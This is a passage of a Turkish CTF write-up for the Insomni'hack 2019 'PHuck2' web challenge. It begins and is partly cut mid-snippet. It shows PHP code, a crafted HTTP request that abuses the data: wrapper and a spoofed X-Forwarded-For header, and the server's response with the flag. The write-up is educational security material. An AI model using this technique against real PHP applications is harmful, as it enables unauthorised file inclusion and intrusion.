Rating: 3.2

```php
“127001” gibi)

---
```php
$mkdir($userFolder);
chdir($userFolder);
file_put_contents('profile',print_r($_SERVER,true));
chdir('..');
```
``$userFolder`` değeri ile klasör açar ve o klasörün içine ``profile`` adlı dosyaya [``$_SERVER`` arrayinin](http://php.net/manual/tr/reserved.variables.server.php) içeriğini yazar.

---
```php
$_GET['page']=str_replace('.','',$_GET['page']);

if(!stripos(file_get_contents($_GET['page']),' döndürdüğü(return) değerini ifade edecek
file_get_contents('data:,xx/profile'); --> string 'xx/profile'
include('data:,xx/profile'); --> 'data:,xx/profile' adına sahip dosyasının içeriği
```
``data`` wrapperi ``file_get_contents``'te çalışırken ``include``'ta çalışmadı.

yani;

```
GET /?page=data:,xx/profile HTTP/1.1
X-Forwarded-For: data:,xx
Get-Flag:
Host: phuck.teaser.insomnihack.ch

HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 20:16:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: User-Agent,Accept-Encoding
Content-Length: 1101
Content-Type: text/html; charset=UTF-8

Array
(
[HTTP_X_FORWARDED_FOR] => data:,xx
[HTTP_GET_FLAG] => INS{PhP_UrL_Phuck3rY_h3h3!}
[HTTP_HOST] => phuck.teaser.insomnihack.ch
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.4.29 (Ubuntu) Server at phuck.teaser.insomnihack.ch Port 80</address>

[SERVER_SOFTWARE] => Apache/2.4.29 (Ubuntu)
[SERVER_NAME] => phuck.teaser.insomnihack.ch
[SERVER_ADDR] => 172.17.0.2
[SERVER_PORT] => 80
[REMOTE_ADDR] => ``CENSORED``
[DOCUMENT_ROOT] => /var/www/html/
[REQUEST_SCHEME] => http
[CONTEXT_PREFIX] =>
[CONTEXT_DOCUMENT_ROOT] => /var/www/html/
[SERVER_ADMIN] => [no address given]
[SCRIPT_FILENAME] => /var/www/html/index.php
[REMOTE_PORT] => 42696
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] => page=data:,xx/profile
[REQUEST_URI] => /?page=data:,xx/profile
[SCRIPT_NAME] => /index.php
[PHP_SELF] => /index.php
[REQUEST_TIME_FLOAT] => 1548015373.641
[REQUEST_TIME] => 1548015373
)

```

Ve flag ``INS{PhP_UrL_Phuck3rY_h3h3!}``
---
---
### NOT: Soruyu CTF sırasınca çözmüş olmayıp, CTF sornası IRC'den verilen bilgiler (``Blaklis`` tarafından) yardımı ile yazılmıştır

~ c3z

Original writeup (https://cybersaxostiger.github.io/2019/01/20/Insomni%E2%80%99hack-2019-%E2%80%93-PHuck2/).